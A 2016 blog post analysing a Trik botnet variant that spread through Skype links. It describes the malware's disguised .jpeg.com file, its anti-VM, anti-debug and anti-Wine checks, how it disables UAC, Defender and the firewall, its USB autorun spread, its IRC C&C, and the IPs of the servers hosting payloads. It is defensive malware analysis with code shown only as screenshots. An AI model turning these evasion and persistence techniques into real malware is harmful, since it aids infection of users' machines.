An analysis of a variant of Trik botnet

Today, my friend was infected by a malware after clicked on a link via Skype. This malware is a variant of Trik 2.5 Botnet which was discovered last month[1] but by this time, just a few AV vendors can detect this sample.

Screen Shot 2016-06-30 at 19.54.06

The malicious link looks like :

http://www.goo.gl/[id]?profile_photo=tcthanh.ftu

This link redirects users to another page which downloads a malicious ZIP file automatically:

There is a .NET executable with .jpeg.com extension inside the archive

Screen Shot 2016-06-30 at 20.20.24

By default, Windows Explorer hides file name extensions for known file types. By naming .jpeg.com, this malicious file can treat users it’s an image.

Technical details

The sample is simply a container which hides the actual binary that contains the malicious codes. After the decryption, the actual codes is loaded by Invoke method. Although the sample is obfuscated, it is easy to find out the decryption :

Screen Shot 2016-06-30 at 20.51.24

The malware decrypts parameters, then set its zone transfer id to 2 in order to remove restrictions.

Screen Shot 2016-06-30 at 20.56.07

It carefully checks for the existence of forensics tools and sandboxes

Screen Shot 2016-06-30 at 21.01.29

Then the malware modifies registry to disable UAC:

Screen Shot 2016-06-30 at 21.05.31

Finally, another payload is decrypted and executed :

Screen Shot 2016-06-30 at 21.06.40

This payload is a PE file. The printable strings can tell parts of its story :

C&C server of sample [1] is located at China, but this one is different !

Bot behaviours

Once the malware is running, it adds itself to the registry to run at start up.

Anti-VM[2]

The bot reads the product ID of the first storage device and checks if the ID contains one of four blacklisted strings

Screen Shot 2016-06-30 at 21.41.11

In the image above, the method first opens a handle to the first physical storage device by using CreateFileA on \\\\.\\PhysicalDrive0. Then it sends the control code 0x2D1400 to the device to get the properties of the storage device. If the result contains one of the blacklisted strings, the malware will halt.

Anti – Debug, Anti – Forensics, Anti – Wine

The bot uses IsDebuggerPresent to check whether it is being debugged. Moreover, it checks the existence of debuggers and process explorer tools by using FindWindowA API with these class names:

Screen Shot 2016-06-30 at 21.57.19

The below processes are also being checked :

Screen Shot 2016-06-30 at 22.00.02

This sample can detect if it is running within Wine :

Screen Shot 2016-06-30 at 22.00.54

Bypass Windows Security Mechanisms

The malware adds itself to the authorized application list of Windows Firewall by modifying registry :

Screen Shot 2016-06-30 at 22.05.10

Disable Windows Defender :

Screen Shot 2016-06-30 at 22.10.57

Self-copy

Like other malwares, Trik has abilities to copy itself to other places.

Screen Shot 2016-06-30 at 22.16.32

In the figure, the bot first checks if the current drive type is DRIVE_REMOVABLE or DRIVE_REMOTE before copying itself.

Screen Shot 2016-06-30 at 22.27.20

The malware first creates a batch script DeviceManager.bat. The script checks if the bot is running, if not, the script will start it.

A javascript is created to launch the batch script :

Screen Shot 2016-06-30 at 22.35.41

Finally, an auto-run configuration file is put in the device to make the scripts run automatically whenever the device is ready.

Screen Shot 2016-06-30 at 22.37.11

File-over

If there is any DRIVE_FIXED device, the malware will delete all EXEs, ZIPs, RARs it found and replace with itself.

Screen Shot 2016-06-30 at 22.42.41

Malicious File Downloader

The malware downloads itself from the Internet. From the dynamic analysis result, there are at least 2 alive servers are hosting malicious codes.

Screen Shot 2016-06-30 at 23.16.35

 

C&C Communication

This variant of Trik still uses IRC to communicate with its C&C server. However, up to now, there is no evidence can prove that the bot can perform tasks given by C&C Server.

C&C Server of this sample is in Vietnam instead of China.

Screen Shot 2016-06-30 at 23.22.45

Whois result :

The bot connects to C&C Server and registers itself :

Screen Shot 2016-06-30 at 23.26.17

Dynamic Analysis

After patched the original sample to remove Anti-VM and Anti Wireshark functionality, the bot executed normally in the sandbox.

Traffic dumps from the sandbox shows that the bot connected to C&C Server and joined in 3 channels :

There were 3 binaries being downloaded from the Internet. All of them are the first .NET sample.

Screen Shot 2016-06-30 at 23.31.45

These binaries are hosted in 2 servers :

  • 209.235.144.9
  • 209.126.122.111

Conclusion

  • This variant of Trik botnet was deployed with more evasion mechanisms to bypass AVs and RE.
  • The botnet targeted Vietnamese users since the Skype messages are in Vietnamese and C&C server is located in Vietnam.
  • I wonder if the author of this variant is Vietnamese ?
  • Thanks @k9 for non-tech advices.

References

[1] http://www.exposedbotnets.com/2016/05/2201818780aspergillus-mod-by-snk-hosted.html

[2] https://www.johannesbader.ch/2016/02/phorpiex/

One thought on “An analysis of a variant of Trik botnet

  1. Cool! I’m looking for article like this!

    I think you could continue to analyze the Vietnamese Skype message (is it natural or just using Google Translate) and TRIK 2.5 deliver’s threat to find out if this variant was coded by Vietnamese author(s).

Leave a Reply

Your email address will not be published. Required fields are marked *